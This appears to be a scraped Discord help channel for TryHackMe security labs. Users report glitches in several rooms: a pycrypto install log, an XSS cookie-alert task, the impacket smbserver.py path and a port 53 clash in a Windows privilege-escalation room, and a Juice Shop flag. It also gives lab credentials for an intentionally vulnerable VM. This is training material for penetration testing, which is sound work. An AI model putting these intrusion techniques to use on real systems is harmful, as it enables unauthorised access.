||root@kali:~# pip install pycrypto DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality. Collecting pycrypto Downloading pycrypto-2.6.1.tar.gz (446 kB) |β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ| 446 kB 13.8 MB/s Building wheels for collected packages: pycrypto Building wheel for pycrypto (setup.py) ... done Created wheel for pycrypto: filename=pycrypto-2.6.1-cp27-cp27mu-linux_x86_64.whl size=525217 sha256=fb6071b7be726dcefb2f196ec346890b0455f389dfc65f508b99834a03d87602 Stored in directory: /root/.cache/pip/wheels/b6/e6/c8/d1eca13628952ceec1d40d96e0a7a1380460d2349ce0b85312 Successfully built pycrypto Installing collected packages: pycrypto Successfully installed pycrypto-2.6.1 root@kali:~# ||

#

FYI, it is working on my local kali VM.

north gyro
#

@whole prairie i need more of the error message to be sure but try sudo pip install wheel

rigid cargo
#

On /room/owasptop10, Task 20, "On the same page, create an alert popup box appear on the page with your document cookies." question doesn't work.

wheat fractal
#

it does work, at least it did for me

#

u may be using wrong script or try restarting the machine

rigid cargo
#

If it's working for others then there must be something wrong with my environment I guess, I've tried this a few times. I'll go back and do screenshots another time

wheat fractal
#

ok

woeful hawk
#

Perhaps not much of an error, but on the https://tryhackme.com/room/windows10privesc the path to the smbserver.py (task 2) is not valid for the THM attack boxes, that version of kali needs the command to be python3 /opt/impacket/examples/smbserver.py kail .

TryHackMe
TryHackMe | Windows PrivEsc

Practice your Windows Privilege Escalation skills on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321

#

It's also a bit problematic that the suggested port (53) is bound on the attack box: tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN 815/systemd-resolve

zealous vortex
#

Look at the cmd provided there is an extra curly braces....
I was copy pasting and thinking of network issues but it was different:joy: :joy:

It is in beginers path linux local enumeration

πŸ“Ž 20210102_184949.jpg
eternal summit
woeful hawk
eternal summit
#

@woeful hawk It's pretty usual to have the local DNS server listening on 127.0.0.1:53.

#

Listening on a different interface will fix it

woeful hawk
#

yes I got that working too, thanks for the help and the location of the smbserver.py wasn't that much of a "bug" really to start with (don't know what severity of errors should be reported)

tired pendant
#

@warped talon OWASP Juice Shop Task 5 #3 I have obtained a flag for downloading one of the .bak files but the flag says its incorrect as per @sonic rover and I have downloaded the other .bak file but flag was not given at all. Can you please clarify where the flag actually is?

wild bramble